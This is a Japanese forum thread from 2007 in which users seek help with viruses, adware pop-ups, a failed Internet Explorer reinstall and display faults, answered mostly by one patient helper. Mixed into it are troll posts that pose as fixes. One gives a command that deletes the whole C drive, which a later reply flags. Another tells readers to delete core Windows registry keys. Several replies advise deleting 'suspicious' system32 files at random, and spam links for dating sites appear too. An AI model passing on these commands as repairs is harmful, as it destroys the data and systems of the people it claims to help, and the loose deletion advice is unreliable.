再インストールせずにセットアップを終了させてください

と言われセットアップ終了を押すことに・・・
何か間違っていますか?
間違っていたら、教えてください
534親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 14:14:23 ID:riX0jIAo
>>533
わからん。おいらの環境だと、全てのコンポーネントの最新バージョンが
の後に再インストールせずに終了か、コンポーネントの再インストールが表示される。
ちなみにいまのIEのバージョンわかるかな。
ヘルプ→バージョン情報ででてくる、6.0なんぼって数字。
535親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 14:20:13 ID:???
>>533
もしよければ、MSN経由でうちのIE6セットアップファイル送ります。
↑の名前のところのメール宛てにMSNからメールください。こっちから登録します。
536533:2007/09/19(水) 14:42:37 ID:UclAB88W
>>534 >>535
すみません、ヘルプ→バージョン情報の行き方が
わかりません・・・どうやってみるのですか?

MSN経由でメールを送りたいのですが
そのやり方も初めての事で、操作がわからないです
お願いします
537親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 14:51:50 ID:riX0jIAo
>>536
ヘルプはIEの一番上の欄にあるやつ。

MSNはMSNのメッセージのページ開いてメールの一覧左上にある新規作成をクリック
あて先に
>>535の名前のところを右クリックしてショートカットのコピー。
あて先にペースト(Ctrl+V)してください。そのとき先頭がMailto:になってるのでその部分は消してください。
件名はなにか適当にTESTとでもいれて、内容もてきとうで
画面左上の送信押してください。
538536:2007/09/19(水) 15:22:21 ID:UclAB88W
>>537
IEの方にアクセスすると、やはりフリーズしてしまいます・・・
しかも、パソコンの動きが鈍くなったような・・・
バージョンを見たくても、見る前にパソコンがジージー っとなきます

メールというのは
MSNのホットメールというやつですか?
新規登録しないと駄目らしく、無料と書いてるほうでいいんですか?
539親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 15:23:35 ID:riX0jIAo
>>538
ホットメールでOKです。
無料で新規登録してください。
540538:2007/09/19(水) 15:39:30 ID:UclAB88W
>>539
こんな時に限ってホットメールにアクセスしたら
ページが表示されました といいつつ画面が真っ白のままで
何もできないんですよね・・・

登録したら、ちゃんと送れてるかどうかわかりませんが
名前の所だけですか?
トリはいらないんでしょうか?
541親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 15:42:55 ID:riX0jIAo
>>540
画面真っ白は画面再読み込みでなんとかならんかな。
IEのツールバーの矢印が二つ回ってるやつ。

いいや。メアド書いちゃえ。
[email protected]
までMSNからメールください。
542540:2007/09/19(水) 16:47:45 ID:UclAB88W
>>541
のアドに送信しました
543親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 16:52:50 ID:riX0jIAo
>>542
受け取りました。
MSNをオンラインに変えてください。
一番上のメニューから、ファイル→状態→オンライン
に変えてください。
544542:2007/09/19(水) 17:11:33 ID:UclAB88W
>>543
一番左端のファイルですか?
クリックしましたが、状態 というのはないんですが
ファイルをクリックしてから、○○から状態へ
みたいなのはありますか?
545まちがって名前消しちゃいました。:2007/09/19(水) 17:34:51 ID:KxX/P1/G
本日21時貴方様に篠原智子様より指名がありました
ID:1685244
篠原智子
27歳
某エステサロンオーナー令嬢
T164 B92(Eカップ) W57 H86
http://moro-ero.com/free/deai/
<<一日の内容詳細>>
内容:貴方様の希望の時間でのお付き合い
至急:貴方様の希望を最優先
当日費用・御礼は篠原智子様もちです。
指名受諾はニックネームの最後に[H]をつけて登録後、篠原さんからのメールをお待ち下さい。
http://moro-ero.com/free/eonna/
※当サイトは登録・利用料全て頂きません。
546親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 17:54:57 ID:riX0jIAo
>>544
MSN Messengerだよね?
サインインすればオンラインになると思うけど。
547544:2007/09/19(水) 18:07:12 ID:UclAB88W
>>546
ホットメールというのからサインインしました
違いましたか?
548親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 18:09:02 ID:riX0jIAo
>>547
スタートのプログラムの中にMSN Messengerてのがあるからそいつ起動してみて。
549親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 18:16:51 ID:riX0jIAo
>>547
いいや。まずはメールで送ってみる。
550547:2007/09/19(水) 18:18:52 ID:UclAB88W
>>548
スタート→プログラム→アクセサリ→通信→
MSN Messenger service でいいんですか?
551親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 18:21:40 ID:riX0jIAo
>>550
たぶんそれ。
メールも送ってみたからチェックしてみてくだされ。
552550:2007/09/19(水) 18:25:14 ID:UclAB88W
>>551
メール届きました さっきと同じで
このメールの添付ファイルの一部が安全でない可能性があるため、
添付ファイルにはアクセスできません。

安全確保のため、このメッセージに含まれている添付ファイル、
画像、およびリンクは無効にされました。
と、書かれています
553親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 18:29:32 ID:riX0jIAo
>>552
了解。圧縮して送ってみる。LHA解凍できるソフトあるかな?。
554552:2007/09/19(水) 18:32:45 ID:UclAB88W
持ってないです・・・
555親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 18:40:58 ID:riX0jIAo
>>554
http://www.kazusoft.net/LHUT3246.EXE
これでいいと思われ。
落としてインストールしてくだされ。
メールは送りました。
556554:2007/09/19(水) 18:53:44 ID:UclAB88W
>>554
の操作の仕方がわからないです・・・

あとメールは届いてました
開く 保存する が出てきたんですがまだ無理なんですよね?
>>555のやり方お願いします
557親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 18:55:41 ID:riX0jIAo
>>556
>>555のEXEダウンロードして実行するとさらにexeファイルができるからそいつをダブルクリック。
そうするとlzhファイルが関連付けされるので、送った添付ファイルを自分のHDに保存してダブルクリックで開けると思う。
558556:2007/09/19(水) 19:05:51 ID:UclAB88W
>>557
何度もすいません
EXEダウンロードがよくわからないのですが・・・
559親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 19:08:37 ID:riX0jIAo
>>558
http://www.katch.ne.jp/~k-ootake/LHUT3246.EXE
ごめん。こっちからクリックしてダウンロードしてください。
560556:2007/09/19(水) 19:15:05 ID:UclAB88W
>>559
をクリックして保存しました
デスクに電子レンジみたいなのと、像みたいなのが
でてきました
電子レンジをダブルクリックした後、どうしたらいいのですか?
561親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 19:29:44 ID:riX0jIAo
>>560
それでファイルの関連付けがされたと思うので、
さっきメールで送ったファイルを保存・ダブルクリックしてください。
そうするとインストーラーIE6setup.exeがでてくるので実行してください。
562親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 19:31:05 ID:riX0jIAo
>>560
でダメだったらメールから保存したファイルを、象さんのアイコンにドラッグしてください。
そうするとファイルができると思います。
563560:2007/09/19(水) 20:22:37 ID:UclAB88W
>>561
保存しました デスクに象さんのアイコンで ie6setup と書いてます
ダブルクリックしてみたら

UNLHA32.DLLが見つかりません
エラーコード0×485
LHOT32はUNLHA32.DLLが無いと動作しません
と表示されました

>>562
のやり方がわかりません お願いします
564まちがって名前消しちゃいました。:2007/09/19(水) 21:05:35 ID:fvk4Y8nv
Win32/VMalum.OTFウイルスが検出されました。
と出たのですが、これは危険ですか?
565親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 21:06:25 ID:riX0jIAo
>>563
http://park8.wakwak.com/~app/Lhaca/Lhaca076.EXE
ごめん。そしたらこっちでやってみて。
クリックして保存したらダブルクリックで起動。
関連付けのLZHとZIP両方ボタンを押してOKおす。
それから保存したie6setup.lzhをダブルクリック。
同じフォルダにir6setup.exeができるからそいつでIEのインストールを試みてください。
566親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 21:14:39 ID:riX0jIAo
>>564
ググッても出てこなかった。
ウィルスならとりあえず消しとくのが吉。
567563:2007/09/19(水) 21:56:57 ID:UclAB88W
>>565
やってみましたが
やはりうまくいきません・・・
選択するのは標準インストールでいいんですか?
その場合、初期化中と表示されて、のちに

全てのコンポーネントの最新バージョンが
既にインストールされています
再インストールせずにセットアップを終了させてください
・セットアップ終了
・再インストールする
と出てきて、再インストールを選択すると
何故か再起動してしまいます
568親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 22:00:46 ID:riX0jIAo
>>567
最後の手段再インストール。
OSのCDをCDドライブにつっこんで、CDから起動する。
HD読みに行っちゃうようだったら起動順位を変える。
パソコン起動した最初の画面にPush XX Key To enter BIOS SETUPとかあるから
猶予時間のうちにそのキーを押す。
BIOSセットアップ画面になったらBoot Diskの項目を探して一番最初にCDドライブを持ってくる。
セットアップ画面はSave&Quitで終わらせる。操作方法は英語だけどそのまんま書いてある。

CDから起動したら修復セットアップを試みる。
単語が違ったらなんかそんな感じの選んで。
新規インストールはしちゃだめ。データが全部消える。
修復セットアップできればデータの損失は最小限ですむと思う。

メインドライブのDocument And Settingsはどっかできれば別のドライブにバックアップとっておいたほうがいい。
MyDocumentのほかにIEのお気に入りとかも入ってる。
OSのデータでコピーできないファイルがあるとおもうからそれはコピーしなくて良い。

569567:2007/09/19(水) 22:32:12 ID:UclAB88W
リカバリCDの事ですか?3枚あるんですけど
ボリューム1 2 3と・・・
あれのせいで選択を色々間違ったのか
インターネットができなくなった記憶があります・・・
完全に初期化してしまったといいますか・・・
マイドキュメントにある画像など
デスクにあるものを残しておくことは可能ですか?

また、別のドライブにバックアップとは何ですか?
なにかCDなど必要なんでしょうか・・・
ゲームのメモリーカード的ななにかが・・・
570まちがって名前消しちゃいました。:2007/09/19(水) 22:33:04 ID:UclAB88W

すいません>>568にです
571親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 22:53:36 ID:riX0jIAo
>>569
うぁ。リカバリCDだと工場出荷時に戻されちゃうからデータが全部すっとぶ。
ちょっと不便だけど今のまま使うしかないかなぁ。
MSNに繋がるし他のページも見れるようだし。
CDが書き込めるやつCD−RとかCD−RWならデータを書き込んで
リカバリしてデータを復旧させるてもあるけれど。
書き込むには書き込みソフトが必要。
http://www.forest.impress.co.jp/lib/sys/hardcust/cddvdburn/
こっからDeepBurnerを手に入れると良いと思う。
572ppppppppp:2007/09/19(水) 22:53:57 ID:syCBIrb2
久々にパソコンつけたら
文字打つところに勝手に文字がどんどん
打たれるんですけど、これってウイルスでしょうか?
キーボードが調子悪いとかじゃないんです。
普通にメモとかだとならないんです。
pばっかり打たれて困るんです。p
573まちがって名前消しちゃいました。:2007/09/19(水) 23:04:16 ID:Fyi48iaX
うけるwwwおまえのあだ名ピーマンなwwwwwww
574570:2007/09/19(水) 23:19:10 ID:UclAB88W
>>571
やっぱりそうでしたか・・・
前にインターネットつないでた時
このMeは兄の会社ものだったんですが、俺がもらったんです
その時はファイアーウォール(?)など色々対策されてたみたいで
それを知らずにインターネットをつないだとき
ウイルスバスター2007体験版のCDでダウンロードしてしまったんです
とにかく、とてつもなく重い状態になってしまって
リカバリしてしまった という感じです
もしかしたら、あのとき初期化しなくても直せる方法があったかも・・・

IEばかりアクセスしてたんで、MSNは気づきませんでしたが
ちょっと安心してます、ちょっと
たしかに少し不便ですが
ホームページアドレスをガッチリ書き直せないように
されてる事などに害はありませんか?
その請求とかきたら・・・ など心配がつのるばかりです
どうでしょうか?
575ppppppppp:2007/09/19(水) 23:26:23 ID:syCBIrb2
やっぱ話しにならないね。p
ま、いっか。p
576まちがって名前消しちゃいました。:2007/09/20(木) 07:01:21 ID:50NQbJMO
すみませんこれ踏んじゃったんですけど…
http://imepita.zz.tc/020070817

トロイらしいんですけどavast!で検出されませんでした。
どうすればいいでしょう?
577親切な馬鹿 ◆ZRdbzBqg5A :2007/09/20(木) 12:04:25 ID:kmMmCsOe
>>576
ノートンだとアクセスが拒否される。
なんらかの怪しいものだと思われ。
心配ならオンラインスキャンどぞ。
シマンテック セキュリティチェック
   (p)http://www.symantec.com/region/jp/securitycheck/index.html
トレンドマイクロ オンラインスキャン
   (p)http://housecall65.trendmicro.com/
578574:2007/09/20(木) 13:33:33 ID:HUl9KmcT
あの・・・
579親切な馬鹿 ◆ZRdbzBqg5A :2007/09/20(木) 13:39:51 ID:kmMmCsOe
>>574
請求はこないと思う。来ても無視でOK。
580まちがって名前消しちゃいました。:2007/09/20(木) 20:06:40 ID:TMwc2jPf
http://www.safewebnavigate.com/index.php?sid=0&aid=0&said=0&pn=&pid=1

トレンドマイクロでも除去できない。
除去してももすぐ、復活する。
これって、史上最強のフィッシッシングかな?

レジストリ書き換えてるとは思うけど。今のとことろ放置してる。
勇気のある人、試して見れ。除去できた人は情報求む。はい

よろしくね^^+
581まちがって名前消しちゃいました。:2007/09/20(木) 20:24:21 ID:eoLOpzob
582まちがって名前消しちゃいました。:2007/09/21(金) 11:53:51 ID:???

助けてください。どうにもこうにも↓が駆除できません。

Trojan-PSW.Win32.Delf.nx

検索しても駆除方法が見つかりません。
外部ドライブ経由でやってきたワームであることは確かなのですが…。
583親切な馬鹿 ◆ZRdbzBqg5A :2007/09/21(金) 12:29:26 ID:dRMcA159
http://research.sunbelt-software.com/threatdisplay.aspx?name=Trojan-PSW.Win32.Delf.nx&threatid=47505
>>582
Windowsフォルダの中の8.exeとWindowsフォルダの中のupdateフォルダの7.exeがそれっぽい。
ファイル名検索して削除。
消せなかったらCtrl+Alt+Deleteでタスクマネージャ起動してプロセス見て
該当のプロセスを終了してから削除。

もしくはカスペルスキー。なんか見っけたらしいとこもある。
オンラインスキャン
http://www.kaspersky.co.jp/virusscanner
584583:2007/09/21(金) 13:23:52 ID:???

ありがとうございます。家に帰ってから頑張ってみます。感謝。
585582:2007/09/21(金) 13:26:32 ID:???
↑582です。すいません・・・。
586まちがって名前消しちゃいました。:2007/09/21(金) 19:14:51 ID:JztQZY/X
2ちゃんのトップページ開いたら、強制的にvirusPROとかいうソフト入れられたみたいなんだが。
『いらね』『いらねっ』って押したり、ウインドウ無理に閉じたんだが、負けたっぽい。
こいつはやっぱ、食らったのかな?
587親切な馬鹿 ◆ZRdbzBqg5A :2007/09/21(金) 19:18:51 ID:dRMcA159
588まちがって名前消しちゃいました。:2007/09/21(金) 21:35:13 ID:JztQZY/X
>>587
 サンキュー。いろんなポップアップがすげー出るようになった。
 さっそく削除するよ。
589まちがって名前消しちゃいました。:2007/09/22(土) 11:56:50 ID:D1jlLvIf
>>461
私も同じ状態です。
amazonのトップページで検索欄に文字を打ち込もうとしても消えてしまう。
文字が上下に改行の仕方を変えながら動く。
amazonの方に問題があるのか、こちらに問題があるのかわかりません。。。
590親切な馬鹿 ◆ZRdbzBqg5A :2007/09/22(土) 15:53:42 ID:UQLCGnIV
>>589
おいらはWindows2000SP4でIE6SP1使ってるけど特定のページで上下する現象がおこる。
amazonがなんかやらかしててIEが誤動作してるだけだと思う。
amazonの検索欄が消えたことはないや。
ページの読み込みが全部終わってから入力欄クリックして入れればいいかも。
591まちがって名前消しちゃいました。:2007/09/22(土) 20:04:01 ID:hL3+XgvY

http://www.adexy3.com/pbbss04/pppt.cgi?room=0921
あそこが感じやすいし、弄られたり舐められたりしたいの。。。
592まちがって名前消しちゃいました。:2007/09/22(土) 23:35:07 ID:NXal3dZ8 BE:1244679168-2BP(0)
ある時から突然、ウイルス除去ソフトの宣伝ポップアップがたくさん開いたり
それに似たような警告ウィンドウが開いたり、さらにはタスクバーのバルーン
にも出たりします。
 「Spyware Alert」や「System Alert」とタイトルが書かれています。
これが出るとexplorer.exeがとても動作が重くなってしまいます。
 どなたか対処法教えてください。
593まちがって名前消しちゃいました。:2007/09/23(日) 12:36:27 ID:ajGuV5cD
なんか表示画面に線が入って、色も薄くなったりして、アイコンとかもでかくなったんだけど
これってウイルス?
594親切な馬鹿 ◆ZRdbzBqg5A :2007/09/23(日) 12:41:32 ID:V5N0MNNx
>>592
たぶんこれでなおると思う。
http://www.higaitaisaku.com/messengerspam.html
595親切な馬鹿 ◆ZRdbzBqg5A :2007/09/23(日) 12:49:43 ID:V5N0MNNx
>>592
マトモなウィルス対策ソフトいれてて、そいつのメッセージじゃなきゃ
まず詐欺なので無視して良い。
>>594でなんとかなると思う。
596親切な馬鹿 ◆ZRdbzBqg5A :2007/09/23(日) 13:15:13 ID:V5N0MNNx
>>593
アイコンが大きくなったのは解像度の問題じゃないかな
http://www1.tcnet.ne.jp/k-saku/person/page_05.htm

色が薄くなったのはディスプレイの色温度の調整と思われ。
ディスプレイのスイッチからいじってみてくだされ。
線が入るのはわからないや。ごめん。
597親切な馬鹿 ◆ZRdbzBqg5A :2007/09/23(日) 13:26:45 ID:V5N0MNNx
>>593
線の件だけど、一箇所に出て動かないならディスプレイの故障。
色が薄いのとあわせたら故障の可能性大。
今のうちに新しいの注文するならそのほうがよい。

Windowにあわせて動くならディスプレイドライバの異常。
メーカーから最新版落としてインストールするか、ドライバの更新。
コントロールパネルからシステム→ハードウェア→デバイスマネージャでディスプレイのやつ探して、
右クリックでプロパティ開いてドライバの更新。
598親切な馬鹿 ◆ZRdbzBqg5A :2007/09/23(日) 13:39:55 ID:V5N0MNNx
>>593
何度もごめんよ。後から思いつくもんでね。
グラフィックカードの故障の可能性もある。
見分け方はちょっとわからないや。
友達から別のディスプレイ借りられれば切り分けできるんだけど。
別のディスプレイでOKならディプレイの故障。
再現するならグラフィックカードかドライバの問題。
599まちがって名前消しちゃいました。:2007/09/23(日) 13:48:46 ID:???
初めまして、皆さんがウイルスに関して詳しいのなら質問があります。
今、自分のPCはネットに繋ぐことができなくなっています。
この書き込みは近所のネカフェから行っています。
詳細としては…
・無線RANを認識しているにもかかわらず認証されない。
・WEPキーは合っている。
・他の家族のPCはちゃんと繋がる。
・数日前、唐突にネット回線から遮断された。
親が言うにはウイルスだそうですが、AVGのスキャンにも引っかかりませんでした。
対処法などを知っている方がいらっしゃれば、教えてくださいませんか?
600親切な馬鹿 ◆ZRdbzBqg5A :2007/09/23(日) 14:38:16 ID:V5N0MNNx
>>599
ごめん。わからないです。その上で言うならドライバのチェックぐらいしか思い当たりません。
コントロールパネルのシステム→ハードウェア→デバイスマネージャで無線LAN関係のデバイスみつけて、右クリックのプロパティからドライバの更新
それでだめなら家族のPCから最新のドライバダウンロードしてインストール。ドライバはフロッピーでも入ると思う。
ダメならCDに焼く。
601592:2007/09/23(日) 14:39:47 ID:1x/ORBsr BE:1867018098-2BP(0)
>>594のサイトの通り実行しようとしましたが、「Messenger」はすでに
停止している状態だったため、効果ありませんでした。
 ということは、Messengerを介しているわけではないということ
なのでしょうか? 
 広告を無視しようにもどんどん増えていくのでexplorer.exeを停止させ
なければ止まらない状況です。 これはこれで不便なので詳細情報をどなたか
願います。
602親切な馬鹿 ◆ZRdbzBqg5A :2007/09/23(日) 14:42:20 ID:V5N0MNNx
>>601
ごめん。こっち参考にしてみて。
SmitFraudFixとかいうのが効くみたい。
http://oshiete1.goo.ne.jp/qa2688570.html
603まちがって名前消しちゃいました。:2007/09/23(日) 15:36:05 ID:ajGuV5cD
>>596
回答ありがとう

>>597
回答ありがとう
ディスプレイドライバ再インストールしたら直ったよ
604592:2007/09/23(日) 16:14:31 ID:1x/ORBsr BE:1270609777-2BP(0)
>>602 なおったっぽいです!ありがとうございました!!!
605まちがって名前消しちゃいました。:2007/09/23(日) 17:58:03 ID:/b2Rup+a
>>580
 ページ自体ではなく、クリックしてダウンロードしたexeがウイルスってこと?
いまメインでやるのは怖いから仮想PC上でexe動かしてみたけど、確かに
入れてしまうと除去できないような気もするw システムの復元でも試したら?
606まちがって名前消しちゃいました。:2007/09/24(月) 20:08:38 ID:vg7RMg14
すいません・・・

スパイウェアをスパイなんとかってソフトで削除したんですけど、起動直後の画像は消えませんでした・・・
ほんとにどうすればいいでしょうか・・・・
607親切な馬鹿 ◆ZRdbzBqg5A :2007/09/24(月) 21:08:36 ID:7d/qQDxv
>>606
削除したならYahooかどっか表示してツール→インターネットオプション→全般のホームページで現在のページにするクリックしたらなおらんかな。
608まちがって名前消しちゃいました。:2007/09/24(月) 22:38:26 ID:???
>>606
無料ので良いから違うソフトでも試してみる。
システム32のフォルダ開けて片っ端から怪しいの削除でおk。
609まちがって名前消しちゃいました。:2007/09/24(月) 22:39:35 ID:vg7RMg14
直らなかったです・・・
ほんとにどうしよ・・・
610まちがって名前消しちゃいました。:2007/09/24(月) 22:45:44 ID:???
>>609
素直にリカバすればおk。
611まちがって名前消しちゃいました。:2007/09/24(月) 22:49:02 ID:???
>>606
マルチで慌てられてもなぁ…
612まちがって名前消しちゃいました。:2007/09/24(月) 23:07:28 ID:vg7RMg14
こういうことはよくあることなんですか?

全く知識がないので・・・


システム32ってどやって出せますか?


613親切な馬鹿 ◆ZRdbzBqg5A :2007/09/24(月) 23:08:36 ID:7d/qQDxv
>>609
とりあえずMe,XP,Vistaならシステムの復元。やり方はヘルプファイル見て。
それでだめならIE再インストール。アンインストールできないけど、バージョンによっては上書きインストールできる。
それでだめならCDブートして修復セットアップ。
それでもだめならCDブートでOS入れなおし。データが、あっさらになるのでバックアップとってからね。
614まちがって名前消しちゃいました。:2007/09/24(月) 23:19:14 ID:???
>>612 まったく知識がない人にはよくあること

マイコンピュータ→起動ドライブ 多分C→WINDOWS→system32
此処だよ。
615まちがって名前消しちゃいました。:2007/09/24(月) 23:19:29 ID:vg7RMg14
ありがとうございました。
やってみます。
616まちがって名前消しちゃいました。:2007/09/24(月) 23:22:15 ID:???
>>612
怪しそうなexeファイルだけだよ。
system32事削除すんなよ。
617まちがって名前消しちゃいました。:2007/09/24(月) 23:29:42 ID:???
>>615
システムの復元でおk。
618まちがって名前消しちゃいました。:2007/09/25(火) 02:39:31 ID:???
すまね、ちょっと教えてくれ
Win32:LoadAdv-J [Trj]ってどんなウイルス?
検索してもコレといったのがかからない
619まちがって名前消しちゃいました。:2007/09/25(火) 07:48:12 ID:ejXw6sxy
トロイを間違えて実行してしまいました
ファイルは通称かおる姫で症状は
CPUが100%になってる
トップ画面のアイコンが透明になってる
(右クリックしたらプロパティが出たので実際はある)
スタートクリックすると何もない状態(多分透明)
動きは半端ないくらい重いです
セーフ&コマンドプロンプトをやってみましたが
何故か字が打てません
スタートアップのシステムは一応出ますが
出るまでに10分かかります

教えて下さい
620まちがって名前消しちゃいました。:2007/09/25(火) 08:15:35 ID:PtKwmR9a
システム32で見つけました。でも削除できないです。
621まちがって名前消しちゃいました。:2007/09/25(火) 08:21:05 ID:PtKwmR9a
システム32で見つけました。
でも削除できません。

ディスクが一杯でないか、書き込み禁止になっていないかまたはファイルが使用中でないか確認してくださいってでるんですけど・・・
622まちがって名前消しちゃいました。:2007/09/25(火) 09:33:55 ID:bQ2jvobV
プレステ3っウイルス感染するの?
623まちがって名前消しちゃいました。:2007/09/25(火) 09:38:07 ID:???
>>620>>621

だ・か・ら system32のな・か・の怪しそうなexeファイルを見つけて
削除汁。おk?
624親切な馬鹿 ◆ZRdbzBqg5A :2007/09/25(火) 10:58:06 ID:59IGby96
>>621
怪しいのであれば、Ctrl+Alt+deleteでタスクマネージャ起動して、
プロセスの一覧だして、怪しい奴をプロセス終了すれば削除できる。
けど、システムのファイルかどうかググってからのほうが良い。
システムのファイル消しちゃうと修復セットアップかリカバリか再インストールになるよ。
625まちがって名前消しちゃいました。:2007/09/25(火) 20:53:52 ID:rvXgCApW
IEのアイコンってゴミに捨てれますか?
捨ててIEのセットアップしようと考えています、いかがですか?
626親切な馬鹿 ◆ZRdbzBqg5A :2007/09/25(火) 21:26:46 ID:59IGby96
>>625
まっとうな手段では消せない。
けどこないだおいらはインターネットの設定でHTTP1.1を使用するのチェック外したら消えた。
IEは残ってたけどね。
IE6でWin2000だと上書きで再インストールできる。
他のOSだと最新版が入ってるからって終了させられるかもしんない。
とりあえず落として試してみるしかない。
627まちがって名前消しちゃいました。:2007/09/25(火) 22:05:03 ID:???
shell32.dllというアプリケーションがあり、インターネットに繋げなくなってしまいました。
これを消そうと思ったのですが、このファイルはたくさんありどれを消したら良いかわかりません。誰か解決法わかる人いますか?
628親切な馬鹿 ◆ZRdbzBqg5A :2007/09/25(火) 22:19:15 ID:59IGby96
>>627
Windowsのsystem32の中身が本物。
あとはUpdateのバックアップとサービスパックi386の中。
それ以外は怪しい。
Windows2000だと実行されてるプロセスには居なかった。
消そうとして実行中で消せなかったらCtrl+Alt+Deleteでタスクマネージャ起動して、
プロセスの一覧から終了する。
それからファイルを消す。
629まちがって名前消しちゃいました。:2007/09/25(火) 22:40:08 ID:PtKwmR9a
消せました。
みなさんいろいろとありがとうございました。


これを機にパソコンいろいろ勉強します。


ほんとうにありがとうございました。
630627:2007/09/25(火) 23:57:02 ID:???
>>628 一応消してみたのですが、やはりインターネットには繋げない状態です。
このような場合何か他の原因を調べる方法はありますかね?
631親切な馬鹿 ◆ZRdbzBqg5A :2007/09/26(水) 14:01:29 ID:m6HkqldB
>>630
ちなみになんかエラーメッセージが出てるようなら教えておくれ。
632まちがって名前消しちゃいました。:2007/09/26(水) 18:26:18 ID:A4Qy/NGQ
助けてください!
オークションスレに貼ってあった
http://omanchin.com を間違ってクリックしてしまいました。

何か影響はありますか?
対策があれば教えてください。
633親切な馬鹿 ◆ZRdbzBqg5A :2007/09/26(水) 18:28:56 ID:m6HkqldB
>>632
とりあえずノートンは反応しなかった。
無害な掲示板サイトと思われ。
心配だったらウィルスチェックとスパイウェアチェックする。
※オンラインウイルススキャン
シマンテック セキュリティチェック
   (p)http://www.symantec.com/region/jp/securitycheck/index.html
トレンドマイクロ オンラインスキャン
   (p)http://housecall65.trendmicro.com/
スパイウェア対策
http://enchanting.cside.com/security/spyware.html
634まちがって名前消しちゃいました。:2007/09/26(水) 18:49:32 ID:A4Qy/NGQ
633さんご親切にありがとうございます。
初めての経験だったので泣きそうでした。。。

サイトの名前が名前だけに悪質なサイトだと思っていました。
詳しいアドレスは↓でした。
http://omanchin.com/railway/omanchin.cgi/up5809

635親切な馬鹿 ◆ZRdbzBqg5A :2007/09/26(水) 19:57:38 ID:689S/RY/
>>634
IPみたいなものが羅列されてただけ。
特に意味は無い。
IPはばれても無害。
636まちがって名前消しちゃいました。:2007/09/26(水) 20:07:28 ID:A4Qy/NGQ
635さんご回答ありがとうございます。

自分なりに調べてみましたが、
IPとクリップボードが盗まれただけみたいです。
637まちがって名前消しちゃいました。:2007/09/26(水) 21:45:42 ID:???
ウイルスに感染してしまったようですが,対処法がわかりません・・・
どなたかアドバイスをお願いいたします orz

OS:XP home

症状:起動直後にC\WINDOWS\TEMPフォルダにtmp1.tmpなど(番号はランダム?)
なファイルが生成される模様。
サイズが大きく,HDDの空き容量ギリギリまでのサイズになり,PCの動作が非常に遅くなる。

Nortonでは生成されたファイルをharadong.trojanと判断しているようです。
しかし,Nortonが削除するとすぐに次のファイルが生成されてます。
Ad-AwareとAvast!を試してみましたが効果なし。
HDDをCとDのパーティションに区切っていますが,Cのみにファイルが生成されてます。

上記のような症状ですが,お分かりになる方いらっしゃいますでしょうか?

638まちがって名前消しちゃいました。:2007/09/26(水) 23:40:31 ID:???
>>638
セーフモードで起動して、ウイルスが活動していなかったらNortonでスキャン&駆除。
もし万が一ウイルスが活動していたら、起動してすかさずシステムの復元w
639まちがって名前消しちゃいました。:2007/09/26(水) 23:41:04 ID:???

誤:>>638
正:>>637
640まちがって名前消しちゃいました。:2007/09/27(木) 01:52:12 ID:VHkZTh6v
Rubbleに感染してしまったみたいなのでOSを入れ直そうとしたのですが
NTLDR is missingと出るだけでインストール画面に移りません
業者に頼むしかないのでしょうか
641返答不可:2007/09/27(木) 11:55:25 ID:9v7/Tj/1
どう考えてもトロイの木馬系のウイルスだろ
642返答不可:2007/09/27(木) 12:04:39 ID:9v7/Tj/1
HDDの電源じゃない方のコードぶち抜いて、OSディスク入れて起動すれば
インストール画面までいけるよ、それでコードを挿し直せばおk
643まちがって名前消しちゃいました。:2007/09/27(木) 13:03:25 ID:OBl6eXKn
Avastを使っているのですが、最近ウイルスチェックでトロイの木馬が発見されました。削除(orチェストへ移動)してみましたがアクセスを拒否され削除できませんでした。全てを削除を選ぶと処理できるのですが数分後にまたウイルスチェックが反応します。
どの様に対象すれば良いでしょうか?
お願いします。


Norton、オンラインウイルススキャンも試してみましたが、トロイの木馬やウイルス等の反応はありませんでした。
644まちがって名前消しちゃいました。:2007/09/27(木) 14:08:43 ID:???
PCの調子が悪かったらこれやってみな、回復するから。

「スタート」メニューを開いて、ファイルを指名して実行をクリック
regeditと入力してOKをクリック(Win2000の場合は、regedt32と入力してOK)
レジストリエディタが開く
HKEY_LOCAL_MACHINE\Software\CLASSES\.dll
HKEY_LOCAL_MACHINE\Software\CLASSES\.exe
HKEY_LOCAL_MACHINE\Software\CLASSES\.sys
HKEY_LOCAL_MACHINE\Software\CLASSES\dllfile
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile
HKEY_LOCAL_MACHINE\Software\CLASSES\sysfile
HKEY_LOCAL_MACHINE\System\CurrentControlSet

上記のキーはウィルス、スパイウェア、ハイジャッカーなのであれば削除すること。
645まちがって名前消しちゃいました。:2007/09/27(木) 15:12:36 ID:???
パソコンの調子が悪いときはこれやってみな。
回復するから・・。

[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c:

646まちがって名前消しちゃいました。:2007/09/27(木) 15:22:32 ID:T1b8dDtz
>>645
はCドライブ全消しのコマンド。
647まちがって名前消しちゃいました。:2007/09/27(木) 19:55:34 ID:???
648まちがって名前消しちゃいました。:2007/09/29(土) 21:53:22 ID:???
>>644
君は一度、逮捕されたほうが良いんじゃないかな
649まちがって名前消しちゃいました。:2007/09/30(日) 12:37:21 ID:???
これウイルスなんですかね?違うような気もするけど心配だよ・・・

ファイル名: C:\WINDOWS\SYSTEM32\IMEPADSV.EXE
ウイルス/スパイウェア名: TSPY_Generic
650まちがって名前消しちゃいました。:2007/09/30(日) 17:56:17 ID:5QX0wvmd
651親切な馬鹿 ◆ZRdbzBqg5A :2007/09/30(日) 18:10:21 ID:nJXgwWQX
>>650
ページを表示できません
